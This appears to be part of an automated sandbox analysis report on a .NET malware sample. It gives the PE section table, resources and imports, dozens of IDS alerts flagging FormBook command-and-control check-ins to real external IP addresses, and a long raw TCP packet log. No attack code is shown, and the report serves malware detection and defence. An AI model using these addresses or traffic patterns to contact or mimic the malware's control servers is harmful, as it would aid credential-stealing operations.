                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                .text0x20000xb5a600xb5c00b4d6a9528d41deef0775470d8ec29227False0.9391549174690509data7.815154891038661IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rsrc0xb80000x4ca80x5000027a0c305e4aa7294aec5d4c02bb0c79False0.91767578125data7.6671485249994555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .reloc0xbe0000xc0x400815d6534af5a99a588549af407f7c516False0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_ICON0xb81000x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                                                                                                                                                                                RT_GROUP_ICON0xbc80c0x14data1.05
                                                                                                                                                                                                                                RT_VERSION0xbc8300x278data0.4699367088607595
                                                                                                                                                                                                                                RT_MANIFEST0xbcab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982184.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976684.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976484.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976584.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980213.248.169.4880TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982284.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049773208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049774208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982384.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049830208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049829208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:50:18.814157+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049831208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:51:29.602451+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049759172.96.191.3980TCP
                                                                                                                                                                                                                                2024-12-03T14:51:45.239026+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049760217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:51:47.974097+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049761217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:51:50.669133+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049762217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:51:53.377169+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049763217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:52:07.151640+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976784.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:52:12.632134+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049768209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:52:15.316664+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049769209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:52:18.035833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049770209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:52:20.725213+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049771209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:52:34.872802+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049775208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:52:40.954663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977689.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:52:43.683508+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977789.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:52:46.402837+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977889.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:52:49.119291+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204977989.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:52:56.160542+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497808.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:52:59.006807+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497818.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:53:01.899070+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497828.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:53:04.845268+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497838.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:53:10.612514+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978438.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:53:13.462096+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978538.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:53:16.305207+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978638.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:53:19.147305+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204978738.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:53:24.700544+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049788103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:53:27.401782+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049789103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:53:30.117901+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049790103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:53:32.806121+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049791103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:53:46.363729+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049792172.67.201.4980TCP
                                                                                                                                                                                                                                2024-12-03T14:53:48.988647+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049793172.67.201.4980TCP
                                                                                                                                                                                                                                2024-12-03T14:53:51.624752+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049794172.67.201.4980TCP
                                                                                                                                                                                                                                2024-12-03T14:53:54.362645+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049795172.67.201.4980TCP
                                                                                                                                                                                                                                2024-12-03T14:53:59.878230+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049796173.0.157.18780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:02.514484+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049797173.0.157.18780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:05.199744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049798173.0.157.18780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:07.869169+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049799173.0.157.18780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:13.225774+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980013.248.169.4880TCP
                                                                                                                                                                                                                                2024-12-03T14:54:15.860993+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980113.248.169.4880TCP
                                                                                                                                                                                                                                2024-12-03T14:54:21.142002+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980313.248.169.4880TCP
                                                                                                                                                                                                                                2024-12-03T14:54:26.872473+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049804192.185.147.10080TCP
                                                                                                                                                                                                                                2024-12-03T14:54:29.582363+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805192.185.147.10080TCP
                                                                                                                                                                                                                                2024-12-03T14:54:32.164731+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049806192.185.147.10080TCP
                                                                                                                                                                                                                                2024-12-03T14:54:34.635788+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049807192.185.147.10080TCP
                                                                                                                                                                                                                                2024-12-03T14:54:40.809851+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049808176.31.209.10780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:43.031819+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049809176.31.209.10780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:45.758627+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049810176.31.209.10780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:48.464695+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049811176.31.209.10780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:54.702361+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981245.197.47.17780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:57.557088+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981345.197.47.17780TCP
                                                                                                                                                                                                                                2024-12-03T14:55:00.395570+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981445.197.47.17780TCP
                                                                                                                                                                                                                                2024-12-03T14:55:03.241493+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981545.197.47.17780TCP
                                                                                                                                                                                                                                2024-12-03T14:55:12.635345+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049816172.96.191.3980TCP
                                                                                                                                                                                                                                2024-12-03T14:55:18.049773+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049817217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:55:20.759489+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049818217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:55:23.500208+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049819217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:55:26.191249+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049820217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:55:39.823002+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204982484.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:55:45.177141+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049825209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:55:47.878778+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049826209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:55:50.586735+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049827209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:55:53.283542+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049828209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:56:07.112706+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049832208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:56:12.795428+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983389.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:56:15.527591+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983489.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:56:18.262666+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983589.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:56:20.978871+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983689.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:56:26.752606+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498378.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:56:30.246380+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498388.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:56:32.490783+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498398.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:56:35.326608+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498408.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:56:40.981355+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984138.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:56:43.821642+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984238.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:56:46.666769+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984338.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:56:49.508113+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204984438.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:56:54.891535+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049845103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:56:57.592625+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049846103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:57:00.284482+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049847103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:57:02.993916+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049848103.224.182.24280TCP

                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                Dec 3, 2024 14:51:28.928473949 CET4975980192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.263997078 CET8049759172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.264179945 CET4975980192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.266508102 CET4975980192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.602140903 CET8049759172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.602164030 CET8049759172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.602286100 CET8049759172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.602451086 CET4975980192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.603205919 CET4975980192.168.11.20172.96.191.39
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.938766956 CET8049759172.96.191.39192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:44.843624115 CET4976080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.030520916 CET8049760217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.030839920 CET4976080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.033953905 CET4976080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.220681906 CET8049760217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.238734961 CET8049760217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.238787889 CET8049760217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.239026070 CET4976080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:46.541331053 CET4976080192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.557262897 CET4976180192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.744235992 CET8049761217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.744559050 CET4976180192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.747675896 CET4976180192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.934751034 CET8049761217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.973843098 CET8049761217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.973896980 CET8049761217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.974097013 CET4976180192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:49.259407997 CET4976180192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.275473118 CET4976280192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.461916924 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.462187052 CET4976280192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.465363026 CET4976280192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.465404987 CET4976280192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.651942015 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.651988983 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.652018070 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.652050972 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.652079105 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.652107000 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.652133942 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.668787956 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.668839931 CET8049762217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.669132948 CET4976280192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:51.978039980 CET4976280192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:52.993577003 CET4976380192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.180692911 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.180924892 CET4976380192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.183054924 CET4976380192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.369575977 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.376332045 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.376877069 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.377168894 CET4976380192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.377680063 CET4976380192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.564188957 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.522651911 CET4976480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.734529972 CET804976484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.734849930 CET4976480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.737869024 CET4976480192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.949829102 CET804976484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.949877977 CET804976484.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.257364035 CET4976580192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.468962908 CET804976584.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.469284058 CET4976580192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.472388983 CET4976580192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.684361935 CET804976584.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.684674025 CET804976584.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:03.991090059 CET4976680192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.203025103 CET804976684.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.203346968 CET4976680192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.206541061 CET4976680192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.206655025 CET4976680192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.418586016 CET804976684.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.418874979 CET804976684.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.418885946 CET804976684.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.724855900 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.936619043 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.936839104 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.938968897 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.150911093 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.150970936 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151252031 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151307106 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151351929 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151395082 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151437998 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151479959 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151530027 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151639938 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151639938 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151798964 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.152437925 CET4976780192.168.11.2084.32.84.32
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.364064932 CET804976784.32.84.32192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.280976057 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.450253963 CET8049768209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.450448990 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.453989029 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.623059988 CET8049768209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.631900072 CET8049768209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.631951094 CET8049768209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.632133961 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:13.957010984 CET4976880192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:14.973061085 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.140580893 CET8049769209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.140841961 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.144032955 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.311431885 CET8049769209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.316479921 CET8049769209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.316529036 CET8049769209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.316663980 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:16.659626007 CET4976980192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.675656080 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.843516111 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.843836069 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.846971035 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.847080946 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.030801058 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.030847073 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.030875921 CET8049770209.74.79.42192.168.11.20
